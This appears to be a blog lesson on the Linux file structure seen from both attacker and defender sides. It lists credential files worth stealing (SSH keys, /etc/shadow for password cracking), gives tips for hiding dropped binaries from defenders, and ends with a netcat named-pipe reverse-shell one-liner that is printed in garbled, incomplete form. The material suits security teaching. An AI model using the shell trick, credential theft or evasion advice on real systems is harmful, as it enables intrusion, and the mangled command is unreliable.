This lesson will not re-invent the wheel by teaching another linux file structure lesson. There are many other articles that already discuss that topic in detail. What this lesson hopes to accomplish is give the reader an understanding of why it is important to learn the linux file structure from both offensive and defensive perspectives.
- The Linux Documentation Project & How Linux Works, 2nd Edition: What Every Superuser Should Know do a spectacular job of describing files, partitions, mount points and file system layout.
One thing to note in all of this is that Linux distributions such as Redhat, Debian will differ slightly in file structure. Overall the most important thing to understand basic file structure and that everything is a file or a process. This means that you could create a special file called a “Named Pipe” or “First in, First Out (FIFO) and it works exactly as it sounds. If you send data in one way with a redirection operator, you can read data on the other end.
As a defender, you should understand your operating environment. A key part to being effective is knowing how to separate normal from abnormal. For example binary files in your /proc directory or files executing network connections from /boot may be worth looking into.
Additionally, there are several files that as a defender should guard closely, and as an attacker be going after. Knowing what these files are, where to get them, and when they have weak permissions are important.
Some but not all of these files are:
- ssh keys located in ~/user/.ssh – weak permissions on this will allow you to grab keys and connect without a password, if the user does not password protect their SSH keys)
- /etc/passwd & /etc/shadow – often considered the crown jewels, grabbing this will let you crack a password with john the ripper relatively quickly
- /proc – reading the contents of this file structure is key to understanding your target. For example /proc/version will highlight many key versions of your kernel and linux distro
- /etc – this will hold a lot of configuration data, many programs store hashes for accounts/passwords
As a defender, you receive a call that one of your systems has been acting erratically. You see that CPU usage spikes in the off hours, the hard drive seems to be more full than normal and you have a process running a binary from the /tmp directory.
Now that you know what a defender would look for, as an attacker or pentester you know how to hide. Avoid placing files in odd locations. If you’re dropping binaries its best to mimic the layout of the target operating system. Being effective at camouflage is an underrated ability.
Additionally, understanding file structure is important because good attackers will be able to use the tools that are already at their disposal. Knowing where tools are and not having to write to the file system means that you leave less of a footprint on the box. If you list the contents of the /bin directory you can see many of the default tools installed on a Linux distro.
On the topic of file systems here is a nifty way to send a reverse shell through netcat if the target system does not have the -e option enabled.
mknod backpipe p; nc 0backpipe
To break it down, mknod creates a backpipe file, nc stdin is sent through stdin(0) and /bin/bash stdout(1) is sent through the backpipe.
To visualize this it looks like this
nc commands > pipe > output
File structures in linux are pretty straight forward. Knowing what to protect, what to attack and how to find exactly what you’re looking for are key concepts for both attackers and defenders.